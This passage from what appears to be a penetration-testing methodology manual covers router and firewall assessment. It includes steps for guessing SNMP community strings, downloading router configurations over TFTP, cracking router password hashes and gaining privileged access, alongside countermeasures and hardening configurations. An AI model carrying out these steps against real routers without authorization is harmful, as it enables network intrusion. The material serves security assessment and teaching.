Implement strong access control mechanism
Tool[s]
•
Nmap
Further Reading[s]
Remarks
Page 579 of 1123
K.1.1.5 TEST PACKET LEAKAGE
Description
Cisco Router discloses its identity while connecting on port 1999 (TCP). It gives RST in
response and “cisco” in payload
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 580 of 1123
K.1.2 Test Common Issues
K.1.2.1 MISCONFIGURATIONS
Description
Verifying the router configuration to common miss configurations to find out what the
vulnerabilities are in the router configuration itself.
Pre-requisite[s]
The router configuration or console access to the router has to be available.
Process
Examples/Results
# rat <router-configuration-file>
Analysis/Conclusion/Observation
The rat tool analyses the configuration file.
Countermeasures
Tool[s]
•
Router Auditing Tool (http://www.cisecurity.org) for Cisco routers
Further Reading[s]
http://www.cisecurity.org
http://www.nsa.gov/notices/notic00004.cfm?Address=/snac/routers/cisco_scg-1.1b.pdf
Remarks
Page 581 of 1123
K.1.2.2 TEST VTY/TTY CONNECTIONS
Description
The simplest and most direct way to connect to the network device is to use a direct
connection to the console port. VTY/TTY connections are used to attach a terminal directly
into the router. In default configuration of router no security applied to the console port.
Also the setup utility does not prompt administrator to configure security for console
access.
VTY/TTY access can be used in an insecure way. Testing this will allow assessor to find
out if there are connections possible through Asynchronous or Network connections to get
terminal access to the router.
Several ports are available in addition to standard ports. High ports 2001, 4001, 6001 can
be tried on routers. Access control on VTY/TTY Access is not really intuitive.
Most routers have five terminal lines. To get max out of it try 5 simultaneous connections.
Pre-requisite[s]
Some pre-requisites for this test are:
•
Having the IP address of the router if this is going to be tested from the internet
•
Having a phone number where a modem connected to the router listens on
•
Having console access to the router
•
Port should be open and accessible from attack point
Process/Example Results
The process to get access to the router:
•
Try Standard Ports for Telnet, ssh, rlogin
•
Try the other ports found with the portscan
If a modem is connected to the device:
•
Try dialing into the router
•
If unsuccessful, try to bring up the terminal window (dial up setting)
•
telnet <Device IP address> <Standard/High Port>
•
ssh <Device IP address> <standard/high port>
The minimum expected result is a login prompt, if the router is not secured, terminal access
Page 582 of 1123
will be possible.
•
User mode attack
Routers are configured for many different modes. In case of Cisco one mode is “user
mode”. While accessing the router through VTY/TTY connections, first router prompts for
password, if it’s been configured, which is by default not and he/she logged into user mode
on the router.
In user mode router displays hostname followed by the greater than symbol. Example of
user mode access:
TargetRouter>
Collect the password hash and decrypt it. CAIN can be used to decrypt it.
•
Privileged mode attack
Commands in user mode are very limited. Enable mode is also known as privileged mode.
To access enable mode type followings:
TargetRouter>enable
If password is not configured and you get following prompt:
TargetRouter#
You have fully compromised the router.
If the router prompts you for the password, perform password attacks.
Analysis/Conclusion/Observation
If telnet or rlogin is used:
•
username/password is send in clear text over the network
Countermeasures
•
Don’t allow telnet on internet interfaces of routers
•
Don’t use telnet for remote management of routers
•
Use appropriate access control lists for remote management connections
•
Place access control mechanism on all the terminal lines
•
Implement user based access control mechanism
Page 583 of 1123
Configure a console password to authenticate users for user mode access by entering the
following commands:
TargetRouter#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
TargetRouter(config)#line con 0
TargetRouter(config−line)#password Y0urPassw0rd
TargetRouter(config−line)#login
TargetRouter(config−line)#end
•
Some router has local user authentication database, it can be used to authenticate
users who connect directly to the console port of a router. An example of Cisco Router
using local user authentication is as follows:
!
username Miguel privilege 15 password 0 romancer
username Dieter privilege 12 password 0 Pr0mptM@n
username Rama privilege 8 password 0 rEc0n
!
line con 0
login local
transport input none
!
It is better to use AAA server for all the authentication requests. All the authentication
requests will be send to the AAA server in encrypted form plus the logs of the session will
be maintained.
Tool[s]
•
CAIN
http://www.oxid.it/cain.html
•
telnet, ssh, Hyper Terminal
Further Reading[s]
Remarks
Page 584 of 1123
K.1.2.3 TEST HTTP CONNECTIONS
Description
In many router implementations, HTTP is used for remote management of routers. HTTP is
clear text and even if the proper access control mechanism is implemented, passwords can
be sniffed.
Pre-requisite[s]
•
Web management port listening on router
Process
•
Check if Router is managed using HTTP
http://<device>
•
Even access list is implemented, password can be sniffed
Examples/Results
Put the screenshot of any router
Analysis/Conclusion/Observation
•
If http is used, the username and password are sent in clear text over the network and
it can be sniffed
Countermeasures
•
Don’t use http for remote management of routers, use https instead
•
Use strong access control lists for remote management connections
•
Tool[s]
•
Internet Explorer
•
Router Remote Management Tool (e.g. Cisco Secure Policy Manager for Cisco)
Further Reading[s]
Remarks
Page 585 of 1123
K.1.2.4 TEST SNMP
Description
Simple Network Management Protocol(SNMP). Its a boon for administrators who need it
and know how to use it and a curse for someone who is not really careful with it.
Compromising SNMP community strings makes a major dent in the over all security.
Guessing a community string with write privilege is similar to compromising a box.
In many router implementations, SNMP is used with the default community strings active or
with an “old” version of SNMP implemented. Read and write accesses are available to
routers. Some default strings are Public for (read access) and Private (read/write access).
Cisco default string is “ILMI”
SNMP v1 is insecure in its nature. Tool like snmpsniff can be used to gather clear text
community string.
Pre-requisite[s]
•
Port 161 UDP is listening and service is accessible from attack point
•
Device IP Address
•
SNMP communitystring
Process
Outside to Inside approach
•
Identify communitystring
o
Try default communitystring
o
Perform default communitystring attack
o
Perform bruteforce attack
•
Gain router configuration by polling it
•
If the private community string has been found, try to retrieve the router configuration
file through tftp (setup a tftp server on your system)
Inside Approach
•
Sniff the traffic to identify communitystring
•
If the private community string has been found, try to retrieve the router configuration
file through tftp (setup a tftp server on your system)
Page 586 of 1123
Examples/Results
•
snmpwalk –m all –c <community string> <Device ip address> | more
•
snmpnetstat –rn –c <community string> <device ip address>
Analysis/Conclusion/Observation
Countermeasures
•
If the service is not absolutely required, disable it.
•
Filter SNMP (TCP/UDP 161, 162) traffic at border router. Allow trusted subnets to poll
or manage devices externally unless it cannot be avoided.
•
Consider Community strings as important as passwords and apply the same best
practices. (secret = secre?t)
•
Try using SNMP v3 with message authentication and PDU encryption. If not possible
use SNMP V2, it uses MD5 authentication
•
Try to make MIBs read-only wherever it’s possible
An example of configuring SNMP security in Cisco Routers:
1. Define the relationship between the network management station and the agent with the
following command:
snmp−server community <string> {ro|rw} {number}
The number value references an optional access−list
2. Use this command to configure the router to send traps to an NMS host:
snmp−server host host [version {1|2c}] <community string>
<notification type>
3. Configure the type of traps for which a notification is sent to the NMS. You do so with the
following command:
snmp−server enable traps [notification type] –
[notification option]
4. Set the system contact, location, and serial number. You can set the systems contact
with the snmp−server contact [text] command. You set the location with the snmp−server
location [text] command, and you set the serial number with the snmp−server chassis−id
[text] command.
5. Use the access−list command to specify a list of hosts that are allowed read−,
read/write, or write−only access to the router.
Page 587 of 1123
6. Whenever don’t give the write permission with community string.
Tool[s]
•
Snmpwalk (linux)
•
Snmp tools from the windows resource kits
•
Solarwinds tools (commercial)
Further Reading[s]
Remarks
Page 588 of 1123
K.1.2.5 TEST TFTP
Description
Trivial File Transport Protocol (TFTP) uses UDP for data transfer and it is a connection less
protocol, which doesn’t support authentication. TFTP is a limited FTP service with no
authentication. It supports very limited set of commands. It is commonly used by Routers,
Switches and other devices to connect to a TFTP server during Firmware upgrade. On a lot
of routers, TFTP is used to fetch and push configuration files to these routers. Attackers
can abuse this possibility to retrieve the router configuration file. TFTP is insecure in its
nature since its plain text and it can be sniffed.
Pre-requisite[s]
•
TFTP Client
•
TFTP Server IP Address
•
Password sniffing tool
Process
•
Identify TFTP Server(s)
•
Sniff for clear text password(s)
•
Identify router name (nslookup <device IP Address>
•
Download configuration file by guessing it
Examples/Results
•
C:\tftp <tftp server> get <devicename>.cfg
Analysis/Conclusion/Observation
Countermeasures
•
TFTP is plain text; consider using secure tftp as an alternative.
•
Restrict access to TFTP server in your firewall / router
•
Move sensitive files from their default locations
•
Define access level on files
ƒ
•
In case of Linux /etc/tftpaccess.ctl
TFTP server should be implemented on same protected network segment as the
device using it.
•
Password should be encrypted using MD5
Page 589 of 1123
Tool[s]
•
Any TFTP client
Further Reading[s]
Remarks
Page 590 of 1123
K.1.2.6 TEST FINGER
Description
Finger services expose system user information to any entity on the network. Finger works
on port 79 TCP/UDP by default.
•
Helps attacker to guess user accounts by performing guessing usernames.
•
Inform attacker if user has new email.
•
Helps attacker to guess the operating system.
By default finger is enabled into the Cisco Routers
Pre-requisite[s]
•
Finger open port on the router
Process
#finger -l @router-ip-address
#finger -l root@router-ip-address
Examples/Results
# finger <IP address of router>
Login: root
Name: root
Directory: /root
Shell: /bin/bash
On since Mon Oct 13 22:06 (IST) on tty1 54 seconds idle
On since Mon Oct 13 23:53 (IST) on tty2 17 minutes 4 seconds idle
On since Mon Oct 13 23:39 (IST) on tty3 4 hours 56 minutes idle
On since Mon Oct 13 23:39 (IST) on tty4 4 hours 56 minutes idle
On since Mon Oct 13 22:06 (IST) on :0 (messages off)
On since Mon Oct 13 22:34 (IST) on pts/0 from :0.0
50 minutes 6 seconds idle
On since Tue Oct 14 04:20 (IST) on pts/2 from 203.124.156.112
30 minutes 15 seconds idle
On since Tue Oct 14 00:46 (IST) on pts/5 from :0.0
1 hour 7 minutes idle
Mail last read Tue Oct 14 04:04 2003 (IST)
No Plan.
# finger <IP address of router>
Login: broot
Name: Mr. Root
Directory: /root
Shell: /bin/bash
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
Login: nonroot
Name: Non-root root user for NFS
Page 591 of 1123
Directory: /nonexistent
Never logged in.
No Plan.
Shell: nologin
Login: root
Name: Mr. Root
Directory: /root
Shell: /bin/sh
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
Analysis/Conclusion/Observation
ƒ
Finger daemon is running on target system
ƒ
root user is logged in into the system
Countermeasures
ƒ
Strongly recommended to block the port on external interface of Router/Firewall.
ƒ
Run the service on non-standard port
ƒ
Disable the service on router if not used
Tool[s]
•
Disable finger on border routers
•
Use access control lists on the finger port
Further Reading[s]
Remarks
Example given in the test result is from UNIX section.
Page 592 of 1123
K.1.2.7 TEST CDP (CISCO DISCOVERY PROTOCOL)
Description
Cisco Discovery Protocol (CDP) is a layer 2 protocol used by Cisco routers to discover
each other on the same link (segment). This protocol is not routed and therefore this tool is
just useful in the local segment. CDP messages contain information about the sending
Cisco router. These include the device ID (hostname), port ID (which port was the sender),
the platform running on, the software incl. version, what the box is capable of and which
network address (IP address) the interface has. If not configured otherwise, Cisco routers
send these messages out every 30 seconds. In our case (Ethernet), they are send to a
special MAC address (01:00:0C:CC:CC:CC) and therefore are received from every Cisco
router in the same segment. Other routers store the data and hold it for a time defined in
the message (the tool uses the maximum of 255 seconds). Very interesting is, that Cisco
IOS uses the device ID as key to find out if the received message is an update and the
neighbors are already known or not. If the device ID is to long, this test seems to fail and
you constantly fill up the routers memory.
CDP is enabled by default on Cisco Routers. Any directly connected system can determine
the Cisco model number and IOS version.
Pre-requisite[s]
Process
Use a “cdp sniffer” to find information of the Cisco Discovery Protocol.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Disable CDP if not required
o
no cdp run: disables CDP globally
o
no cdp enable: disables CDP on an interface (interface command)
Page 593 of 1123
•
Highly recommended to disable at Border Routers/Switches etc…
Tool[s]
Phenolit CDP tool
Further Reading[s]
Remarks
Page 594 of 1123
K.1.2.8 TEST NTP
Description
The Network Time Protocol (NTP) is often used on border routers and it is enabled by
default. A lot of companies use the border router to synchronize internal servers with it and
let the router connect to external time servers.
A potential attacker can corrupt time if enabled.
Pre-requisite[s]
NTP Port is open on the router.
Process
Try to synchronize the time of your system with that of the router to see if ntp is enabled on
the router.
Examples/Results
ƒ
Ntpdate <ip address of router>
Analysis/Conclusion/Observation
Countermeasures
•
Use access control lists on the ntp ports
Tool[s]
•
Ntpdate
•
Any other ntp client
Further Reading[s]
Remarks
Page 595 of 1123
K.1.2.9 TEST ACCESS TO CONSOLE PORT
Description
If physical access is possible towards the router, then an attacker could perform this test.
Connecting a laptop with a serial cable to the router’s console port is what he/she has to
do. This is an important test since most console access on routers is not protected by any
password.
Also because “execution timeout” is not so often used on console ports. Attackers can
abuse this by simply connecting to the console port.
Pre-requisite[s]
Physical connection to the router
Process
If no password is configured => access will be granted.
If a password is configured on the router => Password Recovery while Reboot (Ctrl +
Break) – see the cisco website for details for each router type.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Physically secure the router (put it in a locked rack)
•
Password protect the console access to the router
•
Configure exec-timeout on the console port
Tool[s]
•
Laptop & serial cable
Further Reading[s]
Remarks
Page 596 of 1123
K.1.2.10
TEST PASSWORD SECURITY
Description
Refer Password Security Assessment Section of ISSAF.
Router passwords are stored in the local configuration file. These password should be
encrypted using XOR, MD5. Other passwords are in the file as well. (HTTP, SNMP strings)
Configuration/Configuration files passing through emails, TFTP, VMPS are vulnerable to
sniffing attacks. Weekly encrypted password can be easily cracked using tool like lepton’s
crack or CAIN. MD5 protected passwords are vulnerable to dictionary attacks.
Pre-requisite[s]
•
Sniffer
•
Hash gathering and password cracking tool
•
Assessment machine
Process
ƒ
Sniff data for testing configuration files passing across network in clear text via
email/NetBIOS/TFTP etc…
ƒ
Download password files and identify the passwords
ƒ
Sniff MD5 hashes and encrypted data
ƒ
Perform dictionary attacks on MD5 hashes
ƒ
Decrypt encrypted passwords, many time you will find week encryption (CISCO type 7
passwords)
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Configure “enable secret” passwords for enable password encryption (for Cisco
routers)
•
Configure “service password-encryption” for other passwords
Tool[s]
Page 597 of 1123
•
Lepton’s crack
•
CAIN
•
Sniffer
•
Sniffer with VQP decoding capability
Further Reading[s]
Remarks
Page 598 of 1123
K.1.2.11
TEST LOOSE AND STRICT SOURCE ROUTING
Description
The path of packet (Outbound and return) is defined in packet itself. It is of two types 1.
Loose source routing and 2. Strict source routing.
Loose source routing: Some hops (routing device) in the path are defined and rest of host
as usual.
Strict source routing: Every hop (routing device) in the path is defined, from start to end.
Pre-requisite[s]
Packet crafter
Examples/Results
Use the ping utility with the source routing options (on windows: “ping –j <hosts>” for loose
and “ping –k <hosts>” for strict source routing.
Analysis/Conclusion/Observation
Countermeasures
•
For strict source routing: “no ip source-route”
•
For loose source routing: “no ip redirects”
Tool[s]
•
ping
•
Netcat
•
VSR
Further Reading[s]
Remarks
Page 599 of 1123
K.1.2.12
TEST IP SPOOFING
Description
By using IP spoofing, an attacker can circumvent IP access control lists (mostly configured
on routers) by assuming someone’s identity.
There are multiple techniques available for IP spoofing, which are as follows:
•
Domain Name System
•
TCP Sequence number prediction
•
Packet forging using UDP
•
Source Routing
On the router, a packet with the internal address is originating from external interface is
considered spoofed IP packet
ACL’s are used on the router, if no access control lists are used then this test has little use
since it would definitely be possible to perform IP spoofing then.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
Create an access control list on the router which denies packets with internal IP
address originating from external interface of router.
•
Many router provide inbuilt safeguard for this
•
Limitation
o
IP spoofing from internal network is still permitted
Tool[s]
Page 600 of 1123
Further Reading[s]
Remarks
Page 601 of 1123
K.1.2.13
TEST IP PACKET HANDLING BUGS
K.1.2.14
TEST ICMP REDIRECTS
Description
ICMP Redirects allows an attacker to manipulate host routing tables. An ICMP “redirect”
can specify a new gateway for specific networks.
Pre-requisite[s]
Icmp_redir
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
•
No icmp-redirects is defined in the router enable mode.
Tool[s]
•
icmp_redir
Further Reading[s]
http://www.insecure.org/sploits/arp.games.html
Remarks
Page 602 of 1123
K.1.2.15
TEST ARP ATTACKS
Description
In switched networks packets are switched based on MAC addresses and every host on
different network is considered “private”. Gratuitous ARP is used by host to announce their
IP address. It's a broadcast packet like an ARP request. Manipulation of ARP cache results
into man-in-the-middle attack. Test if ARP spoofing is possible against this router.
Pre-requisite[s]
ARP cache poisoning tool : Ettercap or Dsniff1.3
Examples/Results
Formatted: Bullets and Numbering
Analysis/Conclusion/Observation
Countermeasures
•
Hard code critical ARP entries in the router and gateway/server(s)
•
Private VLANs provides protection against ARP attacks
•
Consider static ARP for critical static routers and hosts
•
Cisco is under development of an ARP firewall
•
Consider implementation of registering MAC addresses for customers, suppliers and
vendors
•
ARPWatch is a freely available tool for ARP attack detection
Tool[s]
•
Ettercap, dsniff
Further Reading[s]
Remarks
Page 603 of 1123
K.1.3 Routing Protocol Assessment
Many routing protocol have weak or no authentication. Spoofed router table updates can
manipulate tables. RIP is most common. It is recommended to filter routing protocol and
use authentication on them.
K.1.3.1 AUTONOMOUS SYSTEM SCANNING
Description
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 604 of 1123
K.1.3.2 RIP (ROUTER INFORMATION PROTOCOL) TESTING
Description
There are two versions of Routing Information Protocol (RIP): version 1 and version 2. RIP
version1 does not support authentication of routing updates & hence the routing updates
can be easily sniffed; however, RIP version 2 supports both plain text and MD5
authentication
Pre-requisite[s]
RIP version 1 does not support any authentication & hence can be easily sniffed through a
sniffer.
RIP version 2.0 supports authentication:
•
Hash gathering and password cracking tool in case hashing is done
•
Password cracking tool clear text authentication
Process
Hash gathering and password cracking tool in case hashing by using MD5 is used. Both
the routers use the same secret key that is being used for generating the hash & appended
to the message. This is also man in the middle attack.
Dictionary attack along with brute force attack is used for cracking the password so that the
message can be read & routing updates can be modified.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
RIP version 1.0 is not suitable as per security point of view. RIP ver 2.0 Routing updates
with clear authentication can be easily broken into. Hence MD5 authentication should be
used & the shared secret should be strong & with a definite lifetime so that cannot be
broken easily. Configuration is as follows :
Central(config)# key chain asdf
Page 605 of 1123
Central(config-keychain)# key 1
Central(config-keychain-key)# key-string asdaaajas-a431
Central(config-keychain-key)# exit
Central(config-keychain)# key 2
Central(config-keychain-key)# key-string khfhgdsdj-16allsd-32hsa
Central(config-keychain-key)# end
Tool[s]
L0pht crack, John the Ripper
Further Reading[s]
Routing & Switching by Jeoff Doyle Part I
Remarks
Page 606 of 1123
K.1.3.3 OPEN SHORTEST PATH FIRST (OSPF) TESTING
Description
Open Shortest Path First (OSPF) supports two forms of authentication: plain text and MD5.
Plain text authentication should be used only when neighboring devices do not support the
more secure MD5 authentication.
Pre-requisite[s]
OSPF supports authentication:
•
Hash gathering and password cracking tool in case hashing is done
•
Password cracking tool clear text authentication
Process
Hash gathering and password cracking tool in case hashing by using MD5 is used. Both
the routers use the same secret key which is being used for generating the hash &
appended to the message. This is also man in the middle attack.
Dictionary attack along with brute force attack is used for cracking the password so that the
message can be read & routing updates can be modified
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
OSPF Routing updates with clear authentication can be easily broken into. Hence MD5
authentication should be used & the shared secret should be strong & with a definite
lifetime so that cannot be broken easily. Configuration is as follows:
CENTRAL(config)# router ospf 1
CENTRAL(config-router)# network 10.1.0.0 0.0.255.255 area 1
CENTRAL(config-router)# area 1 authentication message-digest
CENTRAL(config-router)# exit
CENTRAL(config)# int eth0/0
CENTRAL(config-if)# ip ospf message-digest-key 1 md5 UUGGFGGG321-JH4
Tool[s]
Page 607 of 1123
L0pht crack, John the Ripper
Further Reading[s]
Routing & Switching by Jeoff Doyle Part I
Remarks
Page 608 of 1123
K.1.3.4 BORDER GATEWAY PROTOCOL (BGP) TESTING
Description
BGP is external routing protocol which is used to communicate between different
Autonomous systems .BGP session can be hijacked and incorrect info about the routing
tables could be injected with hijacked session. Session hijacking is easy to do for someone
who can see the TCP sequence number for the TCP session the BGP protocol runs over.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
It can be protected by anti spoofing filters and TCP MD5 password protection
Tool[s]
Further Reading[s]
Remarks
Page 609 of 1123
K.1.3.5 IRDP TESTING
Description
Internet Router discovery protocol is used by host machines to find out the nearest router
which could be used as a Gateway with the help of ICMP packets. The attacker can spoof
the packet and manipulate the entries for the default route which could be harmful for the
network.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Need to make some registry entries in the system running these protocols depending upon
the OS
Eg. Win 98/ME
HKEY_LOCAL_MACHINESystemCurrentControlSetServicesClassNetTrans00n (Where
"000n" is your Tcp/IP protocol. It contains TCP/IP assigned to the "DriverDesc" Value)
PerformRouterDiscovery="0" (DWORD value)
Windows 2000:
HKLMSYSTEMCurrentControlSetServicesTcpipParametersInterfacesinterface
PerformRouterDiscovery="0" (REG_DWORD, range 0,1,2, 0=disabled, 1=enabled,
2=enable only if DHCPsends the router discover option)
Tool[s]
Further Reading[s]
Remarks
Page 610 of 1123
Page 611 of 1123
K.1.3.6 EIGRP (DISCOVERY)
Description
EIGRP is a proprietary routing protocol of Cisco Systems. It’s authentication of packets has
been supported since IOS version 11.3. EIGRP route authentication is similar to RIP
version 2, but EIGRP authentication supports only the MD5 version of packet encryption.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
Page 612 of 1123
K.1.4 Assess Denial of Service Attacks
Secure router configuration can play a big role in avoiding denial of service and
distributed denial of service attack.
Network based Denial of Service
•
Malformed packets
•
Packet floods
Network based denial of service attacks can be divided into categories: 1. Malformed
packets attacks and 2. Packet flood attacks
Malformed packet attack – Attacker sends single packet of small stream of packets to
target that formed in a way not anticipated by the developers of target machine. The
system is not designed to handle some strangely formed packets and that may result
into crashing the system for e.g., ping-of-depth
Packet Flood attacks – These attacks occurs when the attacker sends to much packets
to the destination & which the destination cannot process for e.g syn attacks.
Page 613 of 1123
K.2 GLOBAL COUNTERMEASURES
Routing devices are critical components. They have “host” specific (routed) and network
specific (routing) weaknesses. Correct configuration and diligence is very important for
router security.
K.2.1 Turn on logging
Configure logging and monitor logs on a regular basis. Analysis of logs will identify
malicious activities and provide early warning signals
•
External router scanning is generally not detected by a Network Intrusion Detection
System. It is recommended to log it.
•
Also packets filtered by Access control lists are generally not detected by a Network
Intrusion Detection System. It is recommended to log it.
o
Command for Cisco Routers: “logging <IP-address>
o
Record activities which violates access lists: e.g. access-list 99 deny
192.168.0.1 0.0.255.255 log
K.2.2 Limit Telnet access
Routers can be remotely managed via a TELNET connection. It is a good idea to limit,
or even disable Telnet access. Allow administration from console port. If remote
management is required limit access to specific IP addresses
K.2.3 Protect passwords
Protect passwords in the system with MD5 or equivalent hashing algorithm. In case of
passwords where the option is not available use encryption to scramble password
strings
K.2.4 Change router banner
Configure a login banner that warns users against unauthorized access. This may help
in the event of legal action against an intruder. Routers should be configured to give out
banners that do not reveal system information
Page 614 of 1123
K.2.5 Limit local access
By default, when connecting to the console or AUX port, routers give user EXEC mode
access without a password. If the router cannot be physically secured, it is a good idea
to set a user EXEC password on these ports
K.2.6 Secure SNMP
A common method of router management is to use the Simple Network Management
Protocol (SNMP). SNMP was not designed with authentication and data privacy
features. It is recommended that SNMP is disabled on external routers, however if you
must enable it, we recommend that a hard-to-guess community name is used and
access is permitted only from specific hosts
K.2.7 Disable all other non-essential services on routers
By default, routers have services enabled which will allow attackers to gain information
and perform Denial of Service attacks. It is recommended that services including finger,
bootp, http, cdp
K.2.8 Configure anti-spoofing
In scenarios where firewalls with no support for anti-spoofing are used routers should be
configured for the same. Nobody from the outside network should be sending packets
with a source address of either your inside network address, or certain well-known and
reserved addresses. Access lists can be used to drop and log these packets
K.2.9 Configure ingress filtering
To protect from un-trusted hosts or users in the inside network, use Ingress Filtering. By
denying packets with spoofed source addresses from the internal network, ingress
filtering prevents malicious inside users from launching some Denial of Service (DoS)
attacks.
K.2.10
Disable IP directed broadcast
Directed broadcasts are used extensively in denial of service attacks including smurf. It
is recommended that IP directed broadcasts are dropped by router to prevent being an
agent for Distributed Denial of Service attacks
Page 615 of 1123
K.2.11
Limit ICMP
Several Denial of Service attacks use the ICMP protocol. The types of ICMP messages
allowed should be limited. At a minimum, in order to allow for Path MTU discovery
(PMTU), consider permitting packet-too-big messages. The other types of ICMP
messages can be disabled
K.2.12
Implement TCP intercept
Implement TCP intercept to avoid sync flood
K.2.13
Reflexive access list to prevent connection hijacking on
internet router
K.2.14
Use CBAC
Use CBAC on intranet and extranet routers where u do not have dedicated firewall
(CBAC intelligently filters TCP and UDP packets based on application layer protocol
information)
K.2.15
Router based IDS
Implement Router based Intrusion Detection System (IDS)
K.2.16
Authentication proxy and AAA
Authentication proxy and AAA in case you do not have separate proxy server.
Page 616 of 1123
L FIREWALL SECURITY ASSESSMENT
L.1 DESCRIPTION
The following paragraphs give more insight in the what, why, benefits & types of firewalls
in common.
L.1.1 What is a Firewall?
A hardware / software solution which ‘sits’ in between two (or more) networks,
separating them from each-other and ensuring that access between the networks is
controlled.
L.1.2 Why Firewall?
•
Reduces risk by protecting systems from attempt to exploit vulnerabilities
•
Increases privacy – makes it harder to gather intelligence about your network
•
Enforces your organization’s security policy
L.1.3 Benefits of Firewall
•
Limiting incoming connections to only those explicitly allowed
•
Limiting outgoing connections to only those explicitly allowed
•
Performing ingress and egress filtering
•
Performing basic intrusion detection
•
Logging of all traffic to and from the network
L.1.4 Types of Firewalls
L.1.4.1 PACKET FILTER FIREWALL
•
Check traffic based access control list (ACL)
•
Typically filters traffic based on
o
Source and destination IP address
o
Source and destination port
•
Basic level of security
•
Data contents passed packet filters are not checked
Page 617 of 1123
•
Fastest
•
IP Fragments are not re-assembled before rule verification
•
Example: IP Chains, Router ACLs
L.1.4.2 STATEFUL FIREWALL
•
Maintains state of each connection by keeping tracks of sequence numbers
•
Matches outbound request to inbound traffic
•
2nd fastest
•
Two major implementations
•
o
State inspection – Checkpoint FW1
o
Cut through proxy – Cisco PIX
o
IP Tables
o
Ipt
o
Netscreen
State inspection – Checkpoint FW1
o
Application derived state
ƒ
o
Communication derived state
ƒ
o
the state information derived from other applications
the state derived from previous communications
Information manipulation
ƒ
the evaluation of flexible expressions based on all the above factors
L.1.4.3 CIRCUIT LEVEL GATEWAYS / PROXIES
•
Proxy means that the connection is “broken” and that the header is rewritten
again.
•
Generally they don’t check on application level
•
Routing is not enabled since all connections are terminated on the proxy and all
connections are started from the proxy
L.1.4.4 APPLICATION GATEWAYS
•
Similar to Circuit Level Gateway / Proxies
•
Application level checking is performed
•
Maintains complete connection state and sequencing through 2 connections
o
Client to proxy
o
Proxy to server
Page 618 of 1123
•
Doesn’t allow client to directly connect to the server
•
Slowest
•
Examples
o
Gauntlet
o
Symantec Enterprise Firewall (previously “Raptor”)
o
Watchguard fireboxes
L.1.4.5 STEALTH/BRIDGE FIREWALL
•
‘Invisible’
•
Transparent bridge
•
Doesn’t need IP addresses
•
Interfaces are in promiscuous mode
•
Accessible only from the console or through a dedicated management interface.
L.1.4.6 HARDWARE FIREWALL APPLIANCES
•
Integrated hardware solution
•
All software including the OS comes preloaded on the platform
•
Network ‘black box’ approach to the security
•
Pre-hardened, limited services open hence less vulnerabilities and more secure
•
Faster because everything is embedded into the hardware (e.g. no harddrive is
needed)
•
Examples:
o
Netscreen (everything in ASICs)
L.1.4.7 APPLICATION LEVEL FIREWALLS
•
Protect single applications (like http)
•
Examples
o
Sanctum Appshield
o
DMZ Shield (Ubizen)
o
…
L.1.5 Against what can a firewall not protect?
•
Attacks originating from the protected network (from the inside)
•
Authorized malicious access
•
Attacks and exploits on ports that are open through the firewall (if the firewall isn’t
an application level firewall)
Page 619 of 1123
•
Attacks that do not pass through the firewall.
•
Attacks originating from backdoor access point (wireless access points,
modems…)
L.1.6 How Do Firewalls work?
•
Packets that pass rules are allowed
•
Packets that don’t match are rejected (preferably dropped)
•
Critical attack information lies in rejected packets
•
Most packet filter & stateful firewalls are working in a “top-down” fashion while
proxy based firewalls don’t
•
Most firewalls have a default drop rule (explicitly deny what is not allowed)
L.1.7 Best practices for Logging
•
Minimal logging for common traffic
•
No logging for noisy traffic
•
Maximum logging for the rest
L.1.8 Address Translation
There are two types of address translation: Port Address Translation (PAT) and Network
Address Translation (NAT)
PAT is also known as “Hide NAT”. Everything is hidden behind the external firewall IP
address.
NAT is also known as “Static NAT”. Every IP address that has to be translated is
mapped one-to-one on additional IP addresses.. This sometimes needs routing to work.
Checkpoint now has a new way of working with static NAT. The translation is performed
on the client side so that no static routes are necessary anymore.
Page 620 of 1123
L.2 PURPOSE
The purpose of this document is to aid in the assessment of the security of a firewall
installation and configuration.
L.3 REQUIREMENT
L.3.1 Understand Organization’s environment
Before the assessment can take place, a study of the organization’s network
environment should be performed.
L.3.2 Technical Requirements
To perform the penetration testing part of this assessment, a list with all IP addresses
together with a network diagram is a must.
To perform the system security assessment, access to the firewall configuration itself is
a must (this either through the console or through a management solution).
L.4 TERMINOLOGY
L.5 HISTORY
L.6 OBJECTIVE
L.6.1 Perspective One
e.g. Security Assessor/Penetration Tester
L.6.2 Perspective Two
e.g. System Administrator
L.7 EXPECTED RESULT
A list with all pro’s and con’s of the currently installed firewall setup.
L.8 METHODOLOGY / PROCESS
•
Locating the firewall
•
Identifying common mis-configurations
•
Testing general attacks on firewalls
•
Testing product specific issues
Page 621 of 1123
Locating the Firewall
•
Performing reverse dns lookups on the target IP range (sometimes the firewall is
registered in DNS)
•
Performing regular traceroute towards the target IP range
•
Performing TCP tracing towards a system behind the firewall
•
Performing Hping scans to a firewalled system (webserver/mailserver)
Look for ICMP messages coming back from the firewall. This can lead to the discovery
of the firewall IP address.
Page 622 of 1123
Identify Common Miss-Configuration[s]
This applies all tests that are mentioned in Router Miss-configuration section
•
Firewall rule-set mapping (firewalk)
•
Port scanning a system behind the firewall can also be helpful.
Test General Attacks on Firewalls
•
Port Redirection
•
Firewall Backdoors
Test Product specific issues
•
CheckPoint Firewall-1
•
CheckPoint NG
•
Nokia IPSO
•
Cisco PIX
•
Microsoft ISA
•
Microsoft Proxy
•
Borderware
•
Gauntlet
•
IP Table / Chains
•
Others
Page 623 of 1123
L.9 LOCATE THE FIREWALL
L.9.1 Expect Admin Prohibited Packets with Source of Firewall
Description
